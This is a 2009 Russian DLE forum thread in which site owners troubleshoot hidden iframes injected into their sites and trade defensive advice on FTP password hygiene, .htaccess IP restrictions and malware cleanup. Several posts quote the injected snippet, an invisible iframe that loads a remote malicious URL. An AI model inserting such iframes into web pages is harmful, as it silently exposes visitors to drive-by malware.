zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 кстати не факт что вот это <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> появилось из-за крякнутого FTP-менеджер или еще каких нибудь программ....была у меня такая трабла ломанули хостера каким то образом и все сайты которые были на серваке все были в этих iframe ...=) Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 + Защитите админку с помощью .htaccessВсмысле? 0_O WWW.ZEOS.IN <Files admin.php> deny from all allow from 000.000.000.000 </Files> Вместо нулей вписать свой IP. кстати не факт что вот это <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> появилось из-за крякнутого FTP-менеджер или еще каких нибудь программ....была у меня такая трабла ломанули хостера каким то образом и все сайты которые были на серваке все были в этих iframe ...=) Что за хостер такой веселый? Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 webturist, это не выход Например если модераторы есть на сайте, то тут надо будет прописывать всем IP адреса В адмминке DLE и так можно сделать запрет на все IP кроме своего. (это стандартная функция, так что ничего прописывать не надо) Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все) Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 webturist, это не выход Например если модераторы есть на сайте, то тут надо будет прописывать всем IP адреса В адмминке DLE и так можно сделать запрет на все IP кроме своего. (это стандартная функция, так что ничего прописывать не надо) Я всем прописываю, апач он и в африке апач. Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту? Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все) Нет уж спасибо, если такая вещь имела место - то он уже ненадежный. кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту? Заходить после смены по ФТП и менять в .htaccess Не очень конечно, но надежно. Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Я всем прописываю, апач он и в африке апач.Знаю очень многих людей, которые подрабатывают модераторами и еще по основной работе ездят в командировки в разные города и страны. Так что, им постоянно IP менять? Нее, это не выход кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?Тогда это точно не выход Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все) Нет уж спасибо, если такая вещь имела место - то он уже ненадежный. кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту? Заходить после смены по ФТП и менять в .htaccess Не очень конечно, но надежно. Ну не знаю это было один раз и думаю что там админа наказали))) А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP))) Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Я всем прописываю, апач он и в африке апач.Знаю очень многих людей, которые подрабатывают модераторами и еще по основной работе ездят в командировки в разные города и страны. Так что, им постоянно IP менять? Нее, это не выход кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?Тогда это точно не выход Мнения могут быть разными. Я исхожу из безопасности, а не из удобства модераторов, ездящих в командировки. Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))Попросите у провайдера статичный IP. Я знаю уже наоборот - статичный, это стандарт, а чтобы менялся, это уже доплачивать надо А по поводу:Журналистам, размещающим новости на многих сайтах, вообще бы для своей работы виртуальный компьютер установить не мешало.Солгасен 100%. Только уже новые технологии, сейчас это называется: Песочница. Супер вещь! Бесплатная и победила рейтинги журнала ДПК Сайт: http://www.sandboxie.com/ Поддерживает русский язык Запускать внутри её можно хоть самый страшный троян в мире и всёравно ничё не будет, перезапустил программу и всё Есть много альтернатив, например, Returnil, но суть одна и таже Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))Попросите у провайдера статичный IP. Я знаю уже наоборот - статичный, это стандарт, а чтобы менялся, это уже доплачивать надо У Вас может и так))) У Нас наоборот за то чтоб постоянный был нужно платить))) Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Подробнее про технологию тут: http://ru.wikipedia.org/wiki/Песочница_(безопасность) Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Подробнее про технологию тут: http://ru.wikipedia.org/wiki/Песочница_(безопасность) Че это ты продаешь свой шаблон? кстати видел у многих стоит он)) Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Причём тут мой шаблон к этому топику? Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Причём тут мой шаблон к этому топику? Думаю этот топ уже не актуален))) Ссылка на сообщение Поделиться на других сайтах
artremkozlov 0 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 Подскажите пожалуйста кто-нибудь в чем проблема : при установке движка после "настройки конфигурации системы" нажимаю "далее" и вместо "установка успешно завершена" выдает ошибку The Error returned was: Access denied for user 'wm4760_artem'@'localhost' (using password: YES)" Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 Не правильный логин пользователя или пароль к базе данных Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 Автор Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход. Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........ Перезалил файлы, пока сайт работает. Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход. Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........ Перезалил файлы, пока сайт работает. Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли Пароль к FTP не нужно хранить в тотале...тоесть при каждом конекте к FTP чтоб тотал спрашивал пароль и вводить его в ручную и тогда не будет этих iframe (если конечно сам хостер не заражен что мало вероятно но все таки может ) Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход. Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........ Перезалил файлы, пока сайт работает. Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли 1. Сюда пошли iFrame, который на сайте прописывается: newvirus@kaspersky.com 2. Пока компьютер не почистишь - пароли будут известны. Если снова прописался - значит трой работает. 3. Copy-Paste - действительно может немного затруднить перехват, но ненадолго. Нужно придерживаться следующего порядка: 1. Сначала чистка компьютера или лучше переустановка ОС. Со всем необходимым + КИС, или КАВ + Агнитум 2. Установка ФТП-менеджера (бесплатного, типа FileZilla или лучше платного FlashFXP, (месяц демо бесплатно) стабильная версия с русским языком 3.6.0 на сайте разработчика) - в нестандартной папке. Настройка на незапоминание истории посещенных узлов и паролей. 3. Вход в панель управления хостинга и изменение пароля ФТП пользователя на сложный и длинный пароль. 4. Вход на сайт по ФТП и удаление кодов iFrame. Можно затем слить сайт себе на компьютер и прошерстить основательно, если время есть. 5. Добавление в .htaccess корня сайта следующего кода: <Files admin.php> deny from all allow from 000.000.000.000 </Files> Где admin.php - Ваш файл админки, если название изменено, соответственно изменить. Например tralivali.php : <Files tralivali.php> deny from all allow from 000.000.000.000 </Files> И где 000.000.000.000 - заменить на Ваш IP, который можно узнать здесь: 2ip.ru 6. Установите виртуальный компьютер + КИС или КАВ + Агнитум 7. Войдите на сайт через виртуальный компьютер и пройдитесь, если коды iFrame все вырезаны - то "визгов" защиты не будет. Все равно проверьте стартап системы. 8. Поменяйте пароли на все, что у Вас есть. Емайл, админка хостинга и так далее. 9. Можете наслаждаться работой отличного двигателя DataLife Engine на своем сайте без троянов. Примечания: 1. Не забудьте отослать код iFrame. 2. IP Модераторов придется прописать в .htaccess, если Вы им доверяете. Неудобства будут если у модераторов динамические IP. Если у Вас динамический IP - после каждой его смены надо будет менять его в .htaccess 3. Всегда храните пароли вне ФТП менеджера. 4. Никакая защита не гарантирует безопасность, если не придерживаться вышеприведенных правил. Даже если их придерживаться - 100% гарантии не существует. Но факт в том, что движок DLE тут непричем. Надеюсь эта инфа поможет тем кому это надо. P.S. Не пользуйтесь IE. Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 webturist, ну это у вас черезчур уж... 2. Установка ФТП-менеджера (бесплатного, типа FileZilla или лучше платного FlashFXP, (месяц демо бесплатно) стабильная версия с русским языком 3.6.0 на сайте разработчика) - в нестандартной папке. Настройка на незапоминание истории посещенных узлов и паролей.мне больше нравится Total Commander, удобный и потом... если в компе трой, какой бы ни был у вас пароль и какой-бы программой не пользовались, пароль всё равно попадёт в чужие руки - в ftp он передаётся в незашифрованном виде Не пользуйтесь IEа чем тогда пользоваться?) Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 Ни чего подобного!! Вы все говорите про IP admina в .htaccess а если IP меняется при каждом конекте? Нужно только одно пароли не хранить в FTP менеджере и все... храните его в текстовом документе в другом месте и вводить его ручками при каждом конекте... Ссылка на сообщение Поделиться на других сайтах
КиберБулка 2 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 а чем тогда пользоваться?) Opera, лиса. IE - Достаточно бажный, в общем как и ось для нее. Ссылка на сообщение Поделиться на других сайтах
baxus 49 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 Если бы все шли в ногу со временем то заметили бы что ИЕ 8 имеет даже два режима отображения сайта. Кривой сайт - кликнул и всё ОК. Также имеется 64 разрядная версия на ОС х64 Так что не сказал бы что ИЕ бажная, то что она не идёт на поводу у пользователей не делает её плохой, да и в принципе это самый используемый браузер. По мне так один большой баг это Опера. Которая диктует свои стандарты в разрез всем, как то: Рамочки оранжевые вокруг текстареа совершенно портящие вид дизайна. Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Архивировано
Эта тема находится в архиве и закрыта для публикации сообщений.